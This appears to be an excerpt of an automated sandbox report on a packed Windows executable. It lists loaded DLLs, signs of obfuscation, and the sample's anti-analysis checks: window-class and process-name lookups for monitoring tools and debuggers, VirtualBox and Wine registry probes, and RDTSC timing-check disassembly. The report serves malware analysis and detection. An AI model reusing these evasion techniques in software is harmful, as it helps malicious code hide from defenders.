Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeSection loaded: kernel.appcore.dllJump to behavior
Source: joE9s9sbv0.exeStatic file information: File size 4508160 > 1048576
Source: joE9s9sbv0.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x289a00
Source: joE9s9sbv0.exeStatic PE information: Raw size of wxhzupjp is bigger than: 0x100000 < 0x1bf400

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\joE9s9sbv0.exeUnpacked PE file: 0.2.joE9s9sbv0.exe.1d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wxhzupjp:EW;vxbexiem:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wxhzupjp:EW;vxbexiem:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: joE9s9sbv0.exeStatic PE information: real checksum: 0x454169 should be: 0x45ba02
Source: joE9s9sbv0.exeStatic PE information: section name:
Source: joE9s9sbv0.exeStatic PE information: section name: .idata
Source: joE9s9sbv0.exeStatic PE information: section name:
Source: joE9s9sbv0.exeStatic PE information: section name: wxhzupjp
Source: joE9s9sbv0.exeStatic PE information: section name: vxbexiem
Source: joE9s9sbv0.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_005541D0 push eax; mov dword ptr [esp], edx0_2_005541D5
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_00252340 push eax; mov dword ptr [esp], 00000000h0_2_00252343
Source: C:\Users\user\Desktop\joE9s9sbv0.exeCode function: 0_2_0028C7F0 push eax; mov dword ptr [esp], 00000000h0_2_0028C743
Source: joE9s9sbv0.exeStatic PE information: section name: wxhzupjp entropy: 7.955910297498214

Boot Survival

barindex
Source: C:\Users\user\Desktop\joE9s9sbv0.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\joE9s9sbv0.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\joE9s9sbv0.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: joE9s9sbv0.exe, 00000000.00000003.1549033971.00000000071F7000.00000004.00001000.00020000.00000000.sdmp, joE9s9sbv0.exe, 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 8DA186 second address: 8DA199 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 8DA199 second address: 8DA19E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 8D99E9 second address: 8D99EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4DD45 second address: A4DD66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A59EBA second address: A59EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A59EBE second address: A59EC4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A59EC4 second address: A59ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A59ECE second address: A59EF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 push ebx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A59EF3 second address: A59EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A59EFB second address: A59EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A59EFF second address: A59F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5A1E3 second address: A5A1E9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D542 second address: A5D569 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FDC0050BD57h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D569 second address: A5D5A9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDC00CE27A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jno 00007FDC00CE27B2h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007FDC00CE27B7h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D5A9 second address: A5D5B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FDC0050BD46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D5F8 second address: A5D6F2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDC00CE27A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c jmp 00007FDC00CE27B4h 0x00000011 nop 0x00000012 mov edx, 5719D9E7h 0x00000017 push 00000000h 0x00000019 jmp 00007FDC00CE27AFh 0x0000001e call 00007FDC00CE27A9h 0x00000023 js 00007FDC00CE27BEh 0x00000029 push eax 0x0000002a jg 00007FDC00CE27B9h 0x00000030 jmp 00007FDC00CE27B3h 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 jmp 00007FDC00CE27B5h 0x0000003e mov eax, dword ptr [eax] 0x00000040 jmp 00007FDC00CE27B9h 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 push edi 0x0000004a jnc 00007FDC00CE27A8h 0x00000050 pop edi 0x00000051 pop eax 0x00000052 mov esi, eax 0x00000054 push 00000003h 0x00000056 mov dword ptr [ebp+129E3090h], edi 0x0000005c jmp 00007FDC00CE27B0h 0x00000061 push 00000000h 0x00000063 mov edx, dword ptr [ebp+129E29EDh] 0x00000069 push 00000003h 0x0000006b mov dx, C07Ah 0x0000006f call 00007FDC00CE27A9h 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007FDC00CE27ABh 0x0000007c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D6F2 second address: A5D716 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDC0050BD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDC0050BD54h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D716 second address: A5D726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D726 second address: A5D740 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D740 second address: A5D755 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D755 second address: A5D791 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDC0050BD4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jng 00007FDC0050BD4Ch 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 jmp 00007FDC0050BD50h 0x0000001b popad 0x0000001c popad 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push edi 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D791 second address: A5D7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop eax 0x00000007 lea ebx, dword ptr [ebp+12B67468h] 0x0000000d mov esi, ecx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D7A7 second address: A5D7B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D86A second address: A5D8B2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDC00CE27A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FDC00CE27B8h 0x00000010 nop 0x00000011 jmp 00007FDC00CE27ADh 0x00000016 push 00000000h 0x00000018 sbb edx, 087AD89Ah 0x0000001e call 00007FDC00CE27A9h 0x00000023 push esi 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D8B2 second address: A5D8BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D8BE second address: A5D8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D8C2 second address: A5D8DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007FDC0050BD46h 0x0000000d pop edi 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D8DB second address: A5D8E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D8E1 second address: A5D8E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5D8E5 second address: A5D914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jns 00007FDC00CE27BDh 0x00000010 jmp 00007FDC00CE27B7h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DA21 second address: A5DA2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FDC0050BD46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DA2B second address: A5DA72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dl, 00000041h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 jl 00007FDC00CE27AAh 0x0000001a pop edi 0x0000001b call 00007FDC00CE27A9h 0x00000020 pushad 0x00000021 push edx 0x00000022 jl 00007FDC00CE27A6h 0x00000028 pop edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push ebx 0x0000002c pop ebx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DA72 second address: A5DAC4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDC0050BD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d jmp 00007FDC0050BD55h 0x00000012 pop ebx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 pushad 0x00000019 jmp 00007FDC0050BD54h 0x0000001e ja 00007FDC0050BD46h 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FDC0050BD4Ch 0x0000002c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DAC4 second address: A5DAC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DAC8 second address: A5DAF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop edx 0x0000000e jo 00007FDC0050BD4Ch 0x00000014 je 00007FDC0050BD46h 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 jbe 00007FDC0050BD46h 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DAF1 second address: A5DAF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DAF7 second address: A5DAFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DAFB second address: A5DB6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push 00000003h 0x0000000e mov edx, dword ptr [ebp+129E2BB1h] 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 pop ecx 0x00000018 push 00000003h 0x0000001a mov edx, esi 0x0000001c call 00007FDC00CE27A9h 0x00000021 pushad 0x00000022 jno 00007FDC00CE27A8h 0x00000028 pushad 0x00000029 jmp 00007FDC00CE27AEh 0x0000002e push esi 0x0000002f pop esi 0x00000030 popad 0x00000031 popad 0x00000032 push eax 0x00000033 jmp 00007FDC00CE27ABh 0x00000038 mov eax, dword ptr [esp+04h] 0x0000003c pushad 0x0000003d jno 00007FDC00CE27ACh 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DB6C second address: A5DBA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD50h 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007FDC0050BD56h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DBA4 second address: A5DBFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a lea ebx, dword ptr [ebp+12B6747Ch] 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FDC00CE27A8h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a movzx esi, ax 0x0000002d mov cx, di 0x00000030 xchg eax, ebx 0x00000031 push edi 0x00000032 jmp 00007FDC00CE27ACh 0x00000037 pop edi 0x00000038 push eax 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c push ecx 0x0000003d pop ecx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A5DBFB second address: A5DBFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A6F69E second address: A6F6A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7BFD4 second address: A7BFD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7BFD8 second address: A7BFED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7C184 second address: A7C18A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7C18A second address: A7C199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FDC00CE27A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7C307 second address: A7C30B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7C455 second address: A7C45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7C5EA second address: A7C5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7C78A second address: A7C792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7C792 second address: A7C796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7C796 second address: A7C7A0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7CD4F second address: A7CD53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A7CD53 second address: A7CD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A72BAC second address: A72BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A72BB0 second address: A72BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4C299 second address: A4C29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4C29F second address: A4C2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4C2A3 second address: A4C2AD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDC0050BD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4C2AD second address: A4C2BA instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDC00CE27A8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
